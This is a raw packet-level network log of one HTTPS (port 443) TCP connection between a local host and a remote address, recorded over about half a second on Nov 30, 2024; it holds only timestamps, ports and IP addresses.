Nov 30, 2024 21:20:08.136420965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.136466980 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.136471033 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.137443066 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.137482882 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.137489080 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.138459921 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.138503075 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.138508081 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.139555931 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.139590025 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.139600039 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.139605999 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.139647961 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.140582085 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.141577959 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.141623974 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.141628981 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.142581940 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.142642975 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.142647982 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.143584013 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.143630028 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.143635035 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.145404100 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.145453930 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.145458937 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.146455050 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.146502018 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.146507025 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.151695967 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.151751995 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.151756048 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.152154922 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.152205944 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.152210951 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.153265953 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.153314114 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.153318882 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.154247999 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.154292107 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.154295921 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.155343056 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.155388117 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.155392885 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.157130003 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.157166004 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.157171965 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.157176971 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.157222986 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.157818079 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.158818007 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.158862114 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.158865929 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.159955025 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.159998894 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.160003901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.165333033 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.165400982 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.165405035 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.165982008 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.166033983 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.166038036 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.166902065 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.166944981 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.166949034 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.211201906 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.211261988 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.211266994 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.212061882 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.212109089 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.212114096 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.213172913 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.213231087 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.213234901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.213843107 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.213887930 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.213892937 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.215475082 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.215518951 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.215523958 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.216507912 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.216556072 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.216559887 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.217463970 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.217504978 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.217509031 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.218478918 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.218545914 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.218549967 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.219580889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.219626904 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.219631910 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.223753929 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.223814011 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.223819971 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.224736929 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.224782944 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.224786997 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.225579023 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.225622892 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.225626945 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.226413012 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.226458073 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.226463079 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.227511883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.227555037 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.227560997 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.229291916 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.229338884 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.229343891 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.264684916 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.264745951 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.264751911 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.266036034 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.266087055 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.266092062 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.267071009 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.267117977 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.267122984 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.276890039 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.276942015 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.276947021 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.277694941 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.277745008 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.277750015 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.278587103 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.278633118 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.278637886 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.323508024 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.323667049 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.323672056 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.323931932 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.323981047 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.323986053 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.326046944 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.326078892 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.326090097 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.326093912 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.326137066 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.326765060 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.327785015 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.327827930 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.327832937 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.328944921 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.328986883 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.328993082 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.329849005 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.329900026 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.329902887 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.330888033 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.330940962 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.330945969 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.332148075 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.332194090 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.332199097 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.333695889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.333739042 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.333744049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.335243940 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.335289001 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.335294008 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.336266041 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.336309910 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.336314917 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.336978912 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.337023973 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.337028027 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.337862015 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.337908983 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.337913990 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.338805914 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.338854074 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.338857889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.344093084 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.344139099 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.344142914 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.345259905 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.345300913 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.345305920 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.346235991 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.346282005 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.346287012 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.347325087 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.347369909 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.347373962 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.348265886 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.348308086 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.348313093 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.349241018 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.349284887 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.349289894 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.350738049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.350783110 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.350788116 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.351748943 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.351793051 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.351799965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.357283115 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.357328892 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.357333899 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.357840061 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.357887983 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.357892036 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.358953953 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.359000921 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.359005928 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.403712034 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.403753042 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.403812885 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.403822899 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.403876066 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.404321909 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.404829025 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.404872894 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.404879093 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.405390978 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.405441046 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.405446053 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.406388044 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.406436920 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.406440020 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410813093 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410851002 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410870075 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.410873890 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410918951 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.410923004 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410957098 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410989046 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.410995007 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.410999060 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.411034107 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.411287069 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.416356087 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.416402102 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.416407108 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.416857958 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.416902065 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.416907072 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.417337894 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.417381048 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.417383909 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.419147015 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.419190884 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.419219017 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.419224977 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.419266939 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.419378042 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.420365095 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.420408010 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.420412064 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.457293987 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.457406998 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.457412958 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.458208084 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.458256960 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.458261967 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.459481001 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.459526062 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.459531069 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.468897104 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.468954086 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.468960047 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.469516993 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.469563961 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.469568968 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.470496893 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.470545053 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.470549107 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.515459061 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.515522003 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.515527964 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.516000032 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.516041040 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.516045094 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.516997099 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.517043114 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.517047882 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.518105984 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.518178940 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.518183947 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.519870996 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.519917965 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.519922972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.520842075 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.520886898 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.520891905 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.521823883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.521877050 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.521882057 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.522826910 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.522878885 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.522883892 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.523837090 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.523910046 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.523914099 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.524930000 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.524980068 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.524983883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.525937080 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.525990009 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.525994062 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.526954889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.527008057 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.527012110 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.528814077 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.528870106 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.528877020 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.529784918 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.529825926 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.529830933 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.530781984 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.530831099 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.530834913 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.535916090 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.535964012 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.535969019 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.536299944 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.536345959 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.536355972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.538121939 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.538165092 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.538170099 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.539123058 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.539165974 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.539170027 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.540128946 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.540177107 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.540182114 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.541142941 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.541184902 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.541189909 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.542285919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.542335033 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.542340994 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.542929888 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.542977095 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.542980909 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.544959068 CET	443	49732	142.250.181.33	192.168.2.4
